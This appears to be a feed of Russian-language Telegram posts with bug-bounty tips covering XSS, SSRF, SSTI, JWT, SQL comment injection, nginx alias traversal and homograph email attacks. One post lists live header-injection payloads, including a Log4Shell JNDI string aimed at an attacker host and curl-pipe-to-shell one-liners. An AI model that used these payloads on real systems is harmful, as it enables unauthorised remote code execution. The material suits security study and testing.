Это далеко не все возможные техники, но именно они чаще всего приводят к результату на практике:
1️⃣ Blind XSS через заголовки: приложения могут логировать ваши данные различными способами, поэтому проверяйте XSS-пэйлоад в HTTP-заголовках (
X-Forwarded-For, Referrer, User-Agent и других)2️⃣ Устаревшие API:
/api/v2 → /api/v1, /api/v2 → /api/, api-v2.example.com → api-v1.example.com или api.example.com3️⃣ SSRF: заменяйте любой URI в запросах на контролируемый вами ресурс через Proxy Interceptor Match & Replace Rule и ждите входящие соединения
4️⃣ Поиск эндпоинтов: используйте GitHub, Google/Yandex дорки, анализируйте JavaScript, Swagger API или другую документацию
5️⃣ CSRF: удалите или замените anti-CSRF токен, меняйте Content-Type и метод запроса
6️⃣ Эксплуатация JWT: ищите слабые алгоритмы подписи, пробуйте манипулировать с токенами
7️⃣ Обход 401/403: попробуйте получить доступ ко вложенному пути (
/admin 401 → /admin/system-resources 200), добавьте спецсимволы или измените методы запроса8️⃣ Неправильная настройка CORS: проверьте правильность настроек CORS и убедитесь, что API позволяет отправлять запросы из любого источника с использованием учётных данных
9️⃣ Тестирование race conditions: проверяйте так называемые high-value транзакции — загрузка файлов, размещение заказов, платежи, переводы
1️⃣0️⃣ XXE: измените Content-Type с
application/json на application/xml и проверьте на наличие XXE1️⃣1️⃣ NoSQL инъекция: манипулируйте параметрами и добавляйте MongoDB (или любой другой NoSQL БД) пэйлоад для обхода ограничений
1️⃣2️⃣ Обход загрузки файлов: пробуйте загрузить файлы с нестандартными расширениями или без них, используйте известные методы обхода (null byte, magic byte и другие)
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11🔥3
Это далеко не все возможные методы обхода ограничений, но даже такие простые и зачастую недооцененные техники могут быть весьма эффективными.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14❤4🤔2
В DevTools есть функция
debug(), которая ставит breakpoint каждый раз, когда вызывается переданный в нее аргумент.Это работает даже для встроенных методов — больше не нужно оборачивать их в прокси.
debug(DOMParser.prototype.parseFromString)
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍3🔥3
Когда веб-приложение обрабатывает пользовательский ввод как часть шаблона, можно использовать встроенные функции шаблонизатора для отображения пользовательских данных, доступа к секретам, чтения локальных файлов и даже удаленного выполнения кода.
Но перед этим важно идентифицировать потенциальную уязвимость SSTI. Один из способов — преднамеренно вызвать ошибку с использованием различных спецсимволов:
{
}
$
#
@
%)
"
'
|
{{
}}
${
<%
<%=
%>Как только мы подтвердим точку инъекции, переходим к следующему этапу — отправке различных пэйлоадов для инъекций в шаблон и наблюдению за тем, какие из них были обработаны.
Этот этап критичен, так как он поможет определить используемый движок шаблонов и создать эффективный пэйлоад для эксплуатации.
Все движки шаблонов используют различный синтаксис, но некоторые элементы могут быть схожи. Несколько часто используемых движков шаблонов рассмотрено в недавнем гайде от Intigriti:
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍2
Задумывались, как лучше находить скрытые GET-параметры или отлавливать DOM XSS? Вместо того чтобы тратить время на брутфорс, попробуйте расширение Eval Villain!
⚡️ Что умеет?
🛠 Как помогает?
URLSearchParams.getPlease open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤3👍3🤡1
Blind SSRF в облачных окружениях часто упирается в то, что приложение не возвращает полный ответ — а значит, забываем про доступ к метаданным для получения учетных данных.
Exception: Invalid JSON). Если увеличить число до ~30, появляется другая ошибка — NetworkException.При эксплуатации SSRF путем указания URL-адреса, содержащего указанную логику, приложение отвечает полной цепочкой редиректов HTTP и нужным ответом.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7❤3
Даже если приложение безопасно обрабатывает SQL-запросы и предпринимаются меры для защиты от SQL-инъекций, использование уязвимой сторонней библиотеки всё равно может свести защиту на нет.
Чаще всего всё ломается на строковых параметрах — если они плохо экранируются, можно сломать синтаксис запроса. Но что если сломать запрос можно не только строками? Например — комментариями.
MySQL требует пробел после
--, чтобы строка была интерпретирована как комментарий. А вот PostgreSQL — нет. И тут всё зависит от режима работы:Но многие клиенты PostgreSQL по умолчанию работают в простом режиме. А иногда расширенный вообще отключён — как, например, в старом
PgBouncer или в некоторых конфигах Datadog.В простом режиме все зависит от того, как библиотека вставит параметры. Например,
PgJDBC при запросе SELECT 1-? и значении параметра -1 сгенерирует:SELECT 1--1
PostgreSQL воспримет
-- как комментарий и просто проигнорирует 1. Такая же история — в pg-promise, pgx, pg, pgdriver.Но можно зайти ещё дальше. Если параметр — многострочная строка, можно внедрить свой код. Комментарий завершится на символе перевода строки, и остальная часть кода будет исполнена. Это даёт возможность внедрить произвольный SQL-код, если вы контролируете параметры.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4🔥4👍3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤6
Одна из интересных техник, на которую стоит обратить внимание при поиске багов в JS-коде — это делегирование событий. Вместо того чтобы вешать обработчик на каждый элемент, его вешают на
document и обрабатывают клики через event.target.Если вы можете внедрить элемент:
<a class="btn" href="https://evil.com">Click me</a>
и приложение уже слушает
.btn на document — ваш элемент тоже будет обработан, как «родной».🔍 Ищите такие обработчики, проверяйте селекторы и пробуйте инжектить элементы, которые их триггерят.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5
HTTP-заголовки вроде
X-Request-ID, X-Correlation-ID или x-trace-id нужны для трассировки запросов, но часто попадают в CI/CD, логи, мониторинг и даже в shell-команды. А значит — расширяют поверхность атаки.id в ответе (x-transaction-id, x-corellation-id, access-control-*).x-request-id: ' " % & > [ $
💥 Примеры атак
🧵 Header Injection
x-request-id: 1%0d%0ax-account:456 → внедрение нового заголовка☕️ Java header split
x-request-id: 1%c4%8d%c4%8anew-header: f00 → \u010d может стать \n → новый заголовок💻 Command Injection
x-request-id: $(id) → прямое выполнение в shell-контексте🧨 Log4Shell
x-request-id: ${jndi:rmi://x${sys:java.version}.attacker/a} — да, оно до сих пор встречается 😳🧬 JSON Injection
x-request-id: 1"}. "payload":{"account":"456","foo":" → если заголовок попал в JSON — можно ломать структуру🕵️♂️ Оптимизация OOB/Blind RCE
При выборе пэйлода для OOB/Blind-атаки важно учитывать, что он может попасть в разные контексты. Поэтому — минимум спецсимволов, чтобы не сломать формат. Что важно учитывать:
${IFS} для пробелов в shell могут блочить, но $IFS — нет.request-id).curl на целевом сервере — это значит, что curl’у можно отдать bash-скрипт со своего сервера.Пример из практики:
'`curl$IFS@mydomain|sh`'$(curl$IFS@mydomain|sh)
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡11❤7🔥6
😎 Поиск SSTI в лайт режиме
Tplmap + GAU = SSTI на автопилоте. Просто дай ссылку — он сам найдёт, где шаблон не закрыли.
🤌 Что делаем:
➡️
➡️
На примере tplmap нашёл уязвимость в
Инструмент умеет находить и эксплуатировать SSTI в популярных шаблонизаторах — вплоть до доступа к файловой системе и выполнению команд на сервере.
⚠️ Проект уже не поддерживается, но логика и подход по-прежнему актуальны. Отличная отправная точка, если хочешь собрать свой инструмент для автоматизации SSTI.
Tplmap + GAU = SSTI на автопилоте. Просто дай ссылку — он сам найдёт, где шаблон не закрыли.
gau example.com — собираем эндпоинтыtplmap.py -u {url} — проверяем на SSTIНа примере tplmap нашёл уязвимость в
_transaction_id, определил движок Jinja2 и успешно заинжектился через {{*}}. Контекст — текст, техника — render, ОС — Linux. Всё по красоте.Инструмент умеет находить и эксплуатировать SSTI в популярных шаблонизаторах — вплоть до доступа к файловой системе и выполнению команд на сервере.
⚠️ Проект уже не поддерживается, но логика и подход по-прежнему актуальны. Отличная отправная точка, если хочешь собрать свой инструмент для автоматизации SSTI.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤2👍2🤔1
Reverse-прокси — серверы поверх веб-приложений, которые маршрутизируют трафик, управляют заголовками и т. д.
Файл
/etc/nginx/nginx.conf содержит глобальные настройки и строку для подключения всех конфигов из /etc/nginx/conf.d/.http {
...
include /etc/nginx/conf.d/*.conf;
}Эти файлы находятся в контексте
http {}, поэтому их не нужно открывать заново. Часто здесь добавляют дополнительные опции для контекста http, а также определения server {} для каждого приложения.Одна из распространенных ошибок, которая может привести к уязвимости, — алиас со слешом в конце. Это происходит, когда выполняются два условия:
alias или proxy_pass содержит слэш в конце☝️ Пример выше показывает эту багу дважды. Проблема в том, что
location /static будет соответствовать любому пути, начинающемуся с /static, включая /staticANYTHING или /static../anything. После этого Nginx удаляет этот префикс и продолжает с оставшимся путем. Теперь это может быть
../anything, и при добавлении к static/ или v1/ может привести к переходу на один уровень выше:GET /static../index.php HTTP/1.1
В итоге получаем путь
/app/static/../index.php, который может раскрыть чувствительные исходники в /app/index.php. proxy_pass — его можно использовать для доступа к непредназначенной директории на бэкенде, используемой для отладки, других версий или даже другого приложения.Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤4
Гомографическая атака (IDN Homograph Attack) использует визуально схожие символы из разных алфавитов, чтобы подменить идентификаторы пользователей — чаще всего email-адреса.
Суть проста: уязвимая система может считать admin@example.com и аdmin@example.com (кириллическая «а» вместо латинской) одним и тем же адресом, а мы используем это, чтобы обойти регистрацию, сброс пароля и даже 2FA.
Нам потребуются Burp Suite, Burp Collaborator и генератор Punycode.
security@gmail.com.bcrkly6yl8ke552nzjt7jtu52w8nwdk2.oastify.com
Проверяем, что почта пришла, логинимся и выходим.
Через Burp перехватываем POST-запрос регистрации. Заменяем
a на à или кириллическую а (в зависимости от цели):security@gmàil.com.bcrkly6yl8ke552nzjt7jtu52w8nwdk2.oastify.com
🎯 Если сервер отвечает:
Email already exists — значит, произошла коллизия (он считает адрес одинаковым).Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22🤯7❤4👎2😁2
Если ты видишь в ответе от сервера значение с именем
id — не проходи мимо. Попробуй найти, где ещё этот id используется в других запросах.▪️ IDOR (Insecure Direct Object Reference),
▪️ BOLA (Broken Object Level Authorization),
▪️ или Function Level Access Control.
id, но не проверяют, чей он и можно ли тебе его вообще видеть.Please open Telegram to view this post
VIEW IN TELEGRAM
❤9✍2🥱1
PHP filter chains — крутые векторы атак, которые позволяют реализовывать разные типы эксплойтов: маскировку файлов, манипуляции с содержимым, побайтовую выгрузку файлов через memory exhaustion и многое другое.
Помните старую добрую тулзу php_filter_chains_oracle_exploit? Да, ту самую, что помогала выцеживать PHP-файлы по байтам через blind file read + memory exhaustion.
Так вот. Пора её отпустить. Есть Lightyear, и это прям next level в эксплуатации примитивов слепого чтения файлов в PHP.
Файлы дампятся быстрее, чище и больше по размеру. Вроде бы та же цепочка фильтров, но будто на стероидах.
Please open Telegram to view this post
VIEW IN TELEGRAM
🥱5❤4👍2
API-разведка — это искусство, особенно когда работаешь с RESTful или GraphQL API, где интроспекция ограничена или отключена. Без документации можно запутаться, но на помощь приходит разведка.
Многие API используют уникальные структуры и эндпоинты. Стандартные словари не всегда помогут. Используй специализированные инструменты вроде
ffuf для брутфорса, а для более глубокого анализа отправляй рабочие эндпоинты в Burp.Мобильные приложения часто используют API, которые могут быть недоступны в веб-версии.
Параметры в ответах могут скрывать дополнительные данные или эндпоинты. Пробуй манипулировать этими параметрами, чтобы выявить скрытые фичи или эндпоинты.
Иногда старые версии API остаются доступными для обратной совместимости. Если API имеет версионность, попробуй обратиться к предыдущим версиям, чтобы найти дополнительные возможности.
Не полагайся только на инструменты автоматизации. Часто решение лежит во внимании к деталям: попробуй нажать все кнопки, изучить доступные фичи приложения и элементы интерфейса.
Если документация есть, начни с неё (Swagger, Postman, GraphQL-схему и другие). Внимательно проанализируй все эндпоинты, запросы и параметры. Не ограничивайся только описанным функционалом — проверь все возможные значения параметров и тестируй нестандартные запросы. Часто документация может быть неполной.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤2